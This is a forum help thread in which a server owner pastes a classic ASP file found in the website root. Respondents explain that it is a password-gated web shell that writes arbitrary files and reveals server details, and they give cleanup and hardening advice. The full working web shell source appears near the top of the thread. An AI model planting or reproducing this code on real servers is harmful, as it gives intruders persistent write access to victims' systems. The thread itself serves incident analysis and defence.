• Status: Solved
  • Priority: Medium
  • Security: Public
  • Views: 506
  • Last Modified:

iis hack - can someone help deciper this text file left on my server ?

I recently noticed a text file on my server. I'm having trouble deciphering it, and deciding my next steps.  I see no other files changed or added at that time.  Advice appreciated.

The .txt file is attached and code is below:

<%
on error resume next
%>
<%
if request("pass")="hack" then
session("pw")="go"
end if
%>
<%if session("pw")<>"go" then %>
<%="<center><br><form action='' method='post'>"%>
<%="<input name='pass' type='password' size='10'> <input "%>
<%="type='submit' value='Go!'></center>"%>
<%else%>
<%
set fso=server.createobject("scripting.filesystemobject")
path=request("path")
if path<>"" then
data=request("da")
set da=fso.createtextfile(path,true)
da.write data
if err=0 then
%>
<%="success"%>
<%else%>
<%="no"%>
<%
end if
err.clear
end if
da.close
%>
<%set da=nothing%>
<%set fos=nothing%>
<%="<form action='' method=post>"%>
<%="<input type=text name=path>"%>
<%="<br>"%>
<%="wenjianlujing:"&server.mappath(request.servervariables("script_name"))%>
<%="<br>"%>
<%="xitong:"&Request.ServerVariables("OS")%>
<%="<br>"%>
<%="WEBFWQ:"&Request.ServerVariables("SERVER_SOFTWARE")%>
<%="<br>"%>
<%="IP:"&Request.ServerVariables("LOCAL_ADDR")%>
<%="<br>"%>
<%=""%>
<%="<textarea name=da cols=50 rows=10 width=30></textarea>"%>
<%="<br>"%>
<%="<input type=submit value=save>"%>
<%="</form>"%>
<%end if%>
test.txt
0
drelinger
Asked:
drelinger
  • 2
  • 2
  • 2
  • +1
1 Solution
 
Steve BinkCommented:
The file looks for a form submission with a field named "pass".  If the "pass" field equals the string "hack", a session variable is set to "go".

Then it looks at the session variable.  If it is not "go", the script renders an HTML form to the user, including the "pass" field.

If the session variable is go, the script displays a different form.  The form includes some server-side information (script name, OS, etc.), a textbox named "path", and a textarea field named "da".  If this form is submitted (assuming the password check passed earlier), the contents of the field "da" from this form submission are written to the file specified in the field "path".  If the file specified in "path" already exists, it is overwritten.

This script is used to place arbitrary files on your server.  Theoretically, it could even be used to write executable files.  The scripts ability to access protected areas will be determined by the security token of the user running IIS (generally, an IUSR_* account).  If you found this file on your server, it is very possible that you have other vulnerabilities or exploits installed, and that your server is currently being used to target your site's visitors for unpleasantness.
0
 
Rick HobbsRETIREDCommented:
Where was this file located?
0
 
Dave BaldwinFixer of ProblemsCommented:
I agree with @routinet, it is a classic ASP file/program to write files on your server.
0
Cloud Class® Course: Microsoft Windows 7 Basic

This introductory course to Windows 7 environment will teach you about working with the Windows operating system. You will learn about basic functions including start menu; the desktop; managing files, folders, and libraries.

 
drelingerAuthor Commented:
file was located in website root directory. There are no other file changes at that specific time.
Can anyone suggest further steps I should take having found this file ?
0
 
Steve BinkCommented:
That really depends on how paranoid you want to be.

In my world, the server would be wiped ASAP, with all services moved to a replacement until such time as it was ready to resume service.  It wouldn't be long, since the server would be restored in full from the latest backup...you do have backups, right?

At the very least, you should begin by doing a code audit for any sites on the server.  The fact that they have access to write arbitrary files means they could theoretically write files and manipulate the meta data.  In other words, just because a file looks like it hasn't been modified, does not mean it is not modified.  One popular target is to inject obfuscated javascript just after the open body tag in HTML files.

And, of course, you need to audit the server itself.  Find out what services/DLLs/extensions are running on boot, and if they're supposed to be there.  It could have a back-door installed, or some other less-visible application designed to tamper with the network communications.

If you do nothing else, you'll need to find how that file got on the server, and close that door.  IME, most of these hacks are the result of brute-forced/dictionary'd FTP or publishing services.  Disable FrontPage/WebDAV extensions.  Force all FTP users to change their passwords, and enforce a level of password complexity.  Above all, audit the security of all user accounts associated with your web service in any way, including the system accounts.  Make sure they have the permissions they need, and nothing more.

The good news is that most incidents like this (again, IME) are drive-by attacks...fire and forget.  They find a vulnerable site (as opposed to targeting the server itself), drop some stealthy javascript redirects, and move on.  If you're on shared hosting, that is probably all it is.  If you host your own server, it is more likely to have been targeted instead of the site, but that pattern still fits.
0
 
Rick HobbsRETIREDCommented:
Just to be sure, I would also run a reliable anti-spyware product like Malware Antibytes
0
 
drelingerAuthor Commented:
Great advice. thank you very much.
0
Question has a verified solution.

Are you are experiencing a similar issue? Get a personalized answer when you ask a related question.

Have a better answer? Share it in a comment.

Join & Write a Comment

Featured Post

Free Tool: ZipGrep

ZipGrep is a utility that can list and search zip (.war, .ear, .jar, etc) archives for text patterns, without the need to extract the archive's contents.

One of a set of tools we're offering as a way to say thank you for being a part of the community.

  • 2
  • 2
  • 2
  • +1
Tackle projects and never again get stuck behind a technical roadblock.
Join Now